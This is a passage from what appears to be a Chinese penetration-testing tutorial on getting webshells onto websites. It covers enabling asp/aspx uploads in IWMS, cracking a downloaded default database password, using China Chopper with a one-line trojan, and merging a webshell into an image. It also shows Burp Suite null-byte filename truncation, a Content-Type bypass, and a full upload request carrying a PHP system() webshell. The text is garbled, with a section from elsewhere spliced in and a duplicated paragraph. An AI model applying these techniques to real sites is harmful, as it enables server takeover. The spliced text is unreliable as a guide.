第八節(jié)通過修改IWMS后臺系統(tǒng)6.8.1修改上傳設(shè)置IWMS4.6未對文件上傳類型進(jìn)行限制，用戶可以自定義上傳類型。在系統(tǒng)設(shè)置中添加可上傳文件類型aspx和asp，如圖6-71所示。6.8.2獲取Webshell1.測試上傳單擊“新聞管理”→“添加新聞”，在添加新聞頁面中單擊添加媒體，如圖6-72所示，系統(tǒng)會自動出現(xiàn)上傳功能。2.獲取上傳文件名稱和路徑如果上傳成功，系統(tǒng)會自動給出文件上傳的具體路徑，如圖6-74所示，本次上傳的具體路徑為“upload/2011_07/temp_11071410205449.aspx”。6.3.2漏洞分析及利用1.分析網(wǎng)站源代碼(1)通過查看網(wǎng)站使用的模板以及樣式表等特征信息，判斷該網(wǎng)站使用了SouthidcEditor，并通過掃描獲取了其詳細(xì)的編輯器地址。(2)下載其默認(rèn)的mdb數(shù)據(jù)庫，并對其密碼進(jìn)行破解，獲取其賬號對應(yīng)的密碼，使用該密碼進(jìn)行登錄，成功進(jìn)入后臺，如圖6-23所示。3.獲取Webshell在本例中上傳的是aspx類型的一句話木馬后門文件，使用中國菜刀打開該Webshell，如圖6-76所示，可以很方便地對該網(wǎng)站進(jìn)行各種文件操作等。4.上傳大馬進(jìn)行管理使用一句話后門比較隱蔽，但操作起來不如大馬方便，因此上傳大馬進(jìn)行管理，如圖6-77所示。6.8.3總結(jié)與思考(1)?IWMS4.6以下版本均存在本節(jié)所提到的問題，通過修改上傳類型可以順利地獲取Webshell。(2)文件上傳獲取Webshell的前提條件是獲取管理員的密碼，估計是因為這個原因?qū)е鹿俜揭恢蔽醋餍扪a(bǔ)。

第九節(jié)

使用BurpSuite抓包上傳Webshel6.9.1環(huán)境準(zhǔn)備(1)安裝Java環(huán)境。(2)安裝BurpSuite工具。6.9.2設(shè)置BurpSuite雙擊burpsuite.jar即可運行，首次運行時需要設(shè)置項目(project)，使用默認(rèn)設(shè)置，單擊“Next”→“StartBurp”運行BurpSuite主界面。1.設(shè)置Proxy在BurpSuite主界面中單擊“Proxy”→“Options”，其中Interface默認(rèn)為:8080，如圖6-78所示。如果地址及端口已經(jīng)存在，則不用設(shè)置，否則需要添加綁定端口Cinterface和地址。1.設(shè)置Proxy在BurpSuite主界面中單擊“Proxy”→“Options”，其中Interface默認(rèn)為:8080，如圖6-78所示。如果地址及端口已經(jīng)存在，則不用設(shè)置，否則需要添加綁定端口Cinterface和地址。2.設(shè)置代理(以IE為例)在瀏覽器中單擊“工具”→“Internet選項”→“連接”→“局域網(wǎng)設(shè)置”，在代理服務(wù)器中填寫地址，端口8080，如圖6-79所示。6.9.3抓包并修改包文件內(nèi)容1.執(zhí)行文件上傳再次打開目標(biāo)網(wǎng)站并進(jìn)入后臺，找到文件上傳處，單擊”選擇文件“選擇預(yù)先設(shè)置好的圖片(在圖片中插入一句話木馬，也可以通過copy/b1.aspx+1.jpgcmd.aspx;.jpg命令合成一張帶一句話或者Webshell的后門圖片)，如圖6-80所示，選擇圖片后BurpSuite會進(jìn)行攔截。2.放行抓包在BurpSuite中單擊”Intercept“，可以看到抓包獲取的信息，其中“Interceptison”表示BurpSuite正在進(jìn)行攔截，單擊“Forward”放行，單擊“Drop”丟棄抓包內(nèi)容。3.修改包內(nèi)容右鍵找到Ctrl?+?R這個按鈕，單擊來到Repeater界面，在這個界面將完成包內(nèi)容的修改工作，把a(bǔ)aa.jpg修改成aaa.asp(后面加上一個空格)，在Windows中文件名稱后的空格將自動被忽略掉，如圖6-82所示。4.提交修改包單擊Hex在右側(cè)編碼區(qū)找到aaa.asp這段文字，一個空格的編碼是(20)，我們修改成(00)然后點擊Go，如果返回一段信息的話，就代表我們已經(jīng)成功了。如果沒有返回信息，請重新來一遍，或者去掉空格，如果不用空格，直接可以點擊Go按鈕發(fā)送，如果返回OK信息則表明修改包成功發(fā)送，如圖6-84所示。6.9.4獲取Webshell提交包到服務(wù)器后，在瀏覽器中會返回執(zhí)行的結(jié)果，顯示文件上傳成功，通過查看文件來獲取上傳文件的地址，如圖6-86所示成功獲取Webshell。6.9.5BurpSuite截斷上傳總結(jié)1.?BurpSuite重命名上傳文件截斷上傳BurpSuite截斷上傳可以突破JavaScript本地檢測，在抓包文件中直接將文件名進(jìn)行替換，例如上傳的文件aaa.jpg是JavaScript驗證允許的，直接在BurpSuite中將jpg修改為asp就可以成功繞過。2.?BurpSuite文件名后空格截斷上傳抓包后在filepath參數(shù)中將aaa.jpg修改為aaa.asp，需要通過hex將空格“20”改為空字符“00”。截斷還有一種情況，就是修改文件名為aaa.asp□.jpg，但是這種情況比較少見。3.?Content-type類型繞過如果上傳腳本是通過檢測的Content-type類型，原為Content-Type:text/plain，將文件類型修改為image/gif即可繞過，代碼如下：<?phpif($_FILES['userfile']['type']!="image/gif"){ //檢測Content-typeecho"Sorry,weonlyallowuploadingGIFimages";exit;}$uploaddir='uploads/';$uploadfile=$uploaddir.basename($_FILES['userfile']['name']);

if(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)){echo"Fileisvalid,andwassuccessfullyuploaded.\n";}else{echo"Fileuploadingfailed.\n";}?>可以在BurpSite中將Request包的Content-Type進(jìn)行修改。POST/upload.phpHTTP/1.1TE:deflate,gzip;q=0.3Connection:TE,closeHost:localhostUser-Agent:libwww-perl/5.803Content-Type:multipart/form-data;boundary=xYzZYContent-Length:155--xYzZYContent-Disposition:form-data;name="userfile";filename="shell.php"Content-Type:image/gif(原為Content-Type:text/plain，此處修改為image/gif即可繞過)<?phpsystem($_GET['command']);?>--xYzZY--

第十節(jié)密碼繞過獲取某站點Webshell6.10